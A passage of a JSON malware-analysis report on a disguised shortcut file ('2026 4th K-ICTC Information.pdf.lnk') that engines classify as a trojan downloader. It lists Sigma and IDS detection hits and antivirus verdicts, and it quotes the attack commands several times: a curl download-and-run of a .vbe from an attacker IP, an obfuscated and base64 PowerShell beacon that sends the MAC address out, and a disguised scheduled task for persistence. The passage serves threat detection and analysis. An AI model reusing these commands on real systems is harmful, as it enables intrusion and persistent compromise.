"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "884b7e21f67a56fc9cb312bdbc27e658c101c449662b2f9e25fd463a75715971",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Registry Tampering by Potentially Suspicious Processes",
"rule_description": "Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc.\nThese processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry\nwithout using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"EventType": "SetValue",
"EventID": "13",
"Image": "C:\\Windows\\SysWOW64\\WScript.exe",
"Details": "QWORD (0x00000000-0x000708f6)",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows Script\\Settings\\Telemetry\\wscript.exe\\VBScriptSetScriptStateStarted"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "eb75f9de2201bfad4ef177dca85b0b8fa8e5a86ba2357af5301f72acbc5eb144",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Execution of Powershell with Base64",
"rule_description": "Commandline to launch powershell with a base64 payload",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "eb80a13f018daf47775fec9d5aaf6173f1ad3ed6a71702583f0bbb2feabc66f4",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "File Download From IP URL Via Curl.EXE",
"rule_description": "Detects file downloads directly from IP address URL using curl.exe",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=59E081BED369AC6034F628C64B8A73531BEDB6E2,MD5=DBD30D70FCDAE1FD343DDAD5C55C4E78,SHA256=E6F66D659242AA7D6DD3C1967714C6CD3E0B11AAA235E7F7A150A3316DAE8E61,IMPHASH=66E86C833873DBB82BDB3D7F9BBE6DC9",
"Description": "The curl executable",
"FileVersion": "8.0.1",
"ParentCommandLine": "\"C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"CommandLine": "curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe ",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\curl.exe",
"Company": "curl, https://curl.se/"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine",
"rule_author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "SHA1=E563BAE25E3C011A1E69B4636C9B29B5661C460A,MD5=89B5A70BF37A93015F4845BF901B7825,SHA256=678652BB50ABB92DE91A69C05EA018C160FB4BE0902ACE14B15749246788CB40,IMPHASH=FD97AFEC4DC549DCD1FE1DAD15035DF9",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=59E081BED369AC6034F628C64B8A73531BEDB6E2,MD5=DBD30D70FCDAE1FD343DDAD5C55C4E78,SHA256=E6F66D659242AA7D6DD3C1967714C6CD3E0B11AAA235E7F7A150A3316DAE8E61,IMPHASH=66E86C833873DBB82BDB3D7F9BBE6DC9",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"CommandLine": "curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe ",
"FileVersion": "8.0.1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\curl.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "%WINDIR%\\system32\\windowspowershell\\v1.0\\powershell.exe",
"Image": "C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "3bc9d14114a6b67367a24df21134d0564d6f08a0ad903d68f9b25e9d8b7f0790",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Scheduled Task Creation Via Schtasks.EXE",
"rule_description": "Detects the creation of scheduled tasks by user accounts via the \"schtasks\" utility.",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "schtasks.exe",
"Hashes": "MD5=796B784E98008854C27F4B18D287BA30,SHA256=356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B,IMPHASH=ECCE05491F2E8F279F4790BCB1318C05",
"Description": "Task Scheduler Configuration Tool",
"FileVersion": "10.0.19041.906 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\system32\\schtasks.exe\" /create /TN Chrome_Update /TR \"C:\\Windows\\System32\\wscript.exe /b \"C:\\users\\public\\music\\ant.vbe\"\" /SC MINUTE /mo 15 /f",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\schtasks.exe",
"Company": "Microsoft Corporation"
}
}
]
}
],
"md5": "b3c90f52e4b86a94ec637fee4354bb84",
"sha256": "169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f",
"lnk_info": {
"volume_serial_number": "16eb-b198",
"modification_date": "2021-05-08T08:14:00.923201Z",
"link_flags": [
"HasTargetIDList",
"HasLinkInfo",
"HasRelativePath",
"IsUnicode",
"EnableTargetMetadata",
"HasArguments",
"HasIconLocation"
],
"local_path": "C:\\Windows\\SysWOW64\\cmd.exe",
"machine_id": "win-n10se95a1ib",
"command_line_arguments": "/c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000",
"icon_location": ".pdf",
"creation_date": "2021-05-08T08:14:00.923201Z",
"target_path": "My Computer (Computer) : C:\\Windows\\SysWOW64\\cmd.exe",
"header": {
"show_window": 1,
"file_size": 250880,
"hot_key": "(0+0)",
"show_window_str": "SW_NORMAL"
},
"relative_path": "..\\..\\..\\Windows\\SysWOW64\\cmd.exe",
"mac_vendor_name": "Unknown (0x7cc255)",
"mac_address": "7c:c2:55:75:de:bd",
"link_target_id_list": [
{
"item_type": 31,
"item_type_str": "CLSID_ShellDesktop",
"clsid": "20d04fe0-3aea-1069-a2d8-08002b30309d"
}
],
"access_date": "2021-05-08T08:14:00.923201Z",
"extra_data": {
"dlt_properties": {
"birth_droid_file_id": "061b897d-1c48-11f1-9338-7cc25575debd",
"droid_file_id": "061b897d-1c48-11f1-9338-7cc25575debd",
"birth_droid_volume_id": "80246616-db4c-471f-9a06-1957a834d5f2",
"droid_volume_id": "80246616-db4c-471f-9a06-1957a834d5f2"
}
}
},
"first_submission_date": 1775246604,
"tlsh": "T14392F0116AD51771D3B6893B44B6A380AA32BD86FC675B4F4190334C3C70A18DC64FAE",
"size": 20398,
"meaningful_name": "2026 4th K-ICTC Information.pdf.lnk",
"last_modification_date": 1779799817,
"vhash": "a903eaf76af17fbf30011c85b35ff86e",
"last_submission_date": 1777528398,
"tags": [
"executes-dropped-file",
"lnk",
"url-pattern",
"long-command-line-arguments"
],
"ssdeep": "24:8pLJUmkzGvFATz+ssFaFoBcT+C47XCx3+P/WxlDRJuY+swmgdpJ:8cmCwubmeg7XChqSPuYrw7pJ",
"unique_sources": 4,
"sha1": "95cc996705f5fb8d7947615269101fb4621306d9",
"names": [
"2026 4th K-ICTC Information.pdf.lnk",
"_169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f.lnk",
"2026 4th K-ICTC Information.pdf.bin",
"pvhhka.exe"
],
"crowdsourced_ids_results": [
{
"rule_category": "policy-violation",
"alert_severity": "high",
"rule_msg": "POLICY-OTHER HTTP request by IPv4 address attempt",
"rule_id": "1:50447",
"rule_source": "Snort registered user ruleset",
"rule_url": "https://www.snort.org/downloads/#rule-downloads",
"rule_raw": "alert tcp any any -> any $HTTP_PORTS ( msg:\"POLICY-OTHER HTTP request by IPv4 address attempt\"; flow:to_server,established; http_header; content:\"Host:\",fast_pattern,nocase; pcre:\"/^Host\\x3a\\s*(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\s*:?\\s*\\d*\\s*$/ims\"; service:http; reference:url,www.w3.org/Protocols/rfc2616/rfc2616-sec15.html; classtype:policy-violation; sid:50447; rev:1; )",
"rule_references": [
"https://www.w3.org/Protocols/rfc2616/rfc2616-sec15.html"
],
"alert_context": [
{
"dest_ip": "103.67.196.25",
"dest_port": 80
}
]
},
{
"rule_category": "Misc activity",
"alert_severity": "low",
"rule_msg": "ET INFO Microsoft Script Encoder Encoded File",
"rule_id": "1:2017282",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert http $EXTERNAL_NET any -> $HOME_NET any (msg:\"ET INFO Microsoft Script Encoder Encoded File\"; flow:established,from_server; file_data; content:\"#@~^\"; within:4; classtype:misc-activity; sid:2017282; rev:4; metadata:attack_target Client_and_Server, created_at 2013_08_07, deployment Perimeter, confidence High, signature_severity Informational, updated_at 2023_04_20; target:dest_ip;)",
"alert_context": [
{
"src_ip": "103.67.196.25",
"src_port": 80,
"hostname": "103.67.196.25",
"url": "http://103.67.196.25/conf.dat"
}
]
},
{
"rule_category": "Potentially Bad Traffic",
"alert_severity": "low",
"rule_msg": "ET HUNTING curl User-Agent to Dotted Quad",
"rule_id": "1:2034567",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"ET HUNTING curl User-Agent to Dotted Quad\"; flow:established,to_server; http.user_agent; content:\"curl/\"; startswith; nocase; fast_pattern; http.host; pcre:\"/^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$/\"; classtype:bad-unknown; sid:2034567; rev:1; metadata:attack_target Client_Endpoint, created_at 2021_12_01, deployment Perimeter, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_01;)",
"alert_context": [
{
"dest_ip": "103.67.196.25",
"dest_port": 80,
"hostname": "103.67.196.25",
"url": "http://103.67.196.25/conf.dat"
}
]
},
{
"rule_category": "Potentially Bad Traffic",
"alert_severity": "low",
"rule_msg": "ET HUNTING schtasks create Command in HTTP Body Response",
"rule_id": "1:2064542",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert http $EXTERNAL_NET any -> $HOME_NET any (msg:\"ET HUNTING schtasks create Command in HTTP Body Response\"; flow:established,to_client; http.stat_code; content:\"200\"; http.response_body; content:\"schtasks\"; fast_pattern; nocase; pcre:\"/^.*?\\x2fcreate.*?\\x2f(?:sc|tn)/Ri\"; reference:url,learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks; classtype:bad-unknown; sid:2064542; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product Windows_11, attack_target Client_and_Server, tls_state plaintext, created_at 2025_09_11, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_09_11, mitre_tactic_id TA0002, mitre_tactic_name Execution, mitre_technique_id T1059, mitre_technique_name Command_And_Scripting_Interpreter; target:dest_ip;)",
"rule_references": [
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks"
],
"alert_context": [
{
"src_ip": "103.67.196.25",
"src_port": 80,
"hostname": "103.67.196.25",
"url": "http://103.67.196.25/view1.php?type=apple&seed=14-D8-64-B8-0F-9E"
}
]
},
{
"rule_category": "Potentially Bad Traffic",
"alert_severity": "low",
"rule_msg": "TGI HUNT Curl to Bare IP Address",
"rule_id": "1:2610804",
"rule_source": "Travis Green: Threat hunting rules",
"rule_url": "https://raw.githubusercontent.com/travisbgreen/hunting-rules/master/hunting.rules",
"rule_raw": "alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"TGI HUNT Curl to Bare IP Address\"; flow:established,to_server; http.user_agent; content:\"curl/\"; startswith; nocase; fast_pattern; http.host; pcre:\"/^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$/\"; classtype:bad-unknown; sid:2610804; rev:1;)",
"alert_context": [
{
"dest_ip": "103.67.196.25",
"dest_port": 80,
"hostname": "103.67.196.25",
"url": "http://103.67.196.25/conf.dat"
}
]
}
],
"filecondis": {
"dhash": "e0e8a00000000080",
"raw_md5": "f22e0cba2e6f867bd00caf903b323a52"
},
"popular_threat_classification": {
"popular_threat_name": [
{
"value": "genbadur",
"count": 5
},
{
"value": "downlnk",
"count": 2
},
{
"value": "kimsuky",
"count": 2
}
],
"suggested_threat_label": "trojan.genbadur/downlnk",
"popular_threat_category": [
{
"value": "trojan",
"count": 21
},
{
"value": "downloader",
"count": 6
}
]
},
"crowdsourced_ids_stats": {
"high": 1,
"medium": 0,
"low": 4,
"info": 0
},
"last_analysis_date": 1779792444,
"sigma_analysis_stats": {
"critical": 1,
"high": 9,
"medium": 7,
"low": 2
},
"type_tag": "lnk",
"trid": [
{
"file_type": "Windows Shortcut",
"probability": 100.0
}
],
"magika": "LNK",
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "8.2.40(8338)",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.WinLNK.GenBadur.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.GenericKD.79850702"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260525",
"category": "malicious",
"result": "LNK/Downloader.hbu"
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.Agent.LNK.Gen"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.235",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5608",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.54.59615",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.54.59617",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1214",
"engine_update": "20260525",
